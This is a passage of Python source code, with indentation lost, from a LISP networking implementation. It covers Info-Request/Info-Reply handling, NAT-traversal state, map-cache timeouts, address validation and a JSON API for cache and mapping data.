if (save_nh != None): lisp_install_host_route(addr_str, save_nh, True)
#endif
return
#enddef
#
# lisp_process_info_request
#
# Process received Info-Request message. Return a Info-Reply to sender.
#
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):
#
# Parse Info-Request so we can return the nonce in the Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return
info.print_info()
#
# Start building the Info-Reply. Copy translated source and translated
# source port from Info-Request.
#
info.info_reply = True
info.global_etr_rloc.store_address(addr_str)
info.etr_port = sport
#
# Put Info-Request hostname (if it was encoded) in private-rloc in
# Info-Reply. Encode it as an AFI=17 distinguished-name.
#
if (info.hostname != None):
info.private_etr_rloc.afi = LISP_AFI_NAME
info.private_etr_rloc.store_address(info.hostname)
#endif
if (rtr_list != None): info.rtr_list = rtr_list
packet = info.encode()
info.print_info()
#
# Send the Info-Reply via the lisp-core process. We are sending from
# a udp46 socket, so we need to prepend ::ffff.
#
lprint("Send Info-Reply to {}".format(red(addr_str, False)))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, sport, packet)
#
# Cache info sources so we can decide to process Map-Requests from it
# specially so we can proxy-Map-Request when the sources are behind NATs.
#
info_source = lisp_info_source(info.hostname, addr_str, sport)
info_source.cache_address_for_info_source()
return
#enddef
#
# lisp_get_signature_eid
#
# Go through the lisp_db_list (database-mappings) and return the first entry
# with signature-eid is True.
#
def lisp_get_signature_eid():
for db in lisp_db_list:
if (db.signature_eid): return(db)
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_port
#
# Find a translated port so we can set it to the inner UDP port number for
# ECM Map-Requests.
#
def lisp_get_any_translated_port():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devies.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is check to see if the private address changed since this
# ETR could have moved to another NAT or the same NAT device reassigned a
# new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
# Check refresh timers. Native-Forward entries just return if active,
# else check for encap-port changes for NAT entries. Then return if
# entry still active.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
# Now remove from lisp_referral_cache all the timed out entries on the
# delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary array with an array a lisp_nat_
# info() values. We keep all the current and previous NAT state associated
# with the Info-Request hostname. This is so we can track how much movement
# is occuring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
# So the youngest entry is not the newest entry. See if it exists as
# an old entry. If not, we prepend the new state, otherwise, we prepend
# the new state and remove the old state from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request to install a emphemeral
# static route to force the Info-Request to go out a specific interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
#endif
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
# Send out Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6
# and MAC addresses.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them to the LISP process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in rloc.multicast_rloc_probe_list.values():
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in site_cache.cache[ml].entries.values():
if (se.accept_more_specifics == False): continue
if (sites.has_key(se.site.site_name) == False):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
